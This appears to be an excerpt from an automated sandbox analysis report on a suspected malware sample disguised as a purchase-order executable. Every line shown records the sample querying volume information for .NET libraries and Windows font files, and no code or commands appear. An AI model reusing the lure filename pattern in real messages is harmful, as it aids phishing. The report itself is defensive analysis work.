                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\Purchase order 450080088 proj. Allt Charnan.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
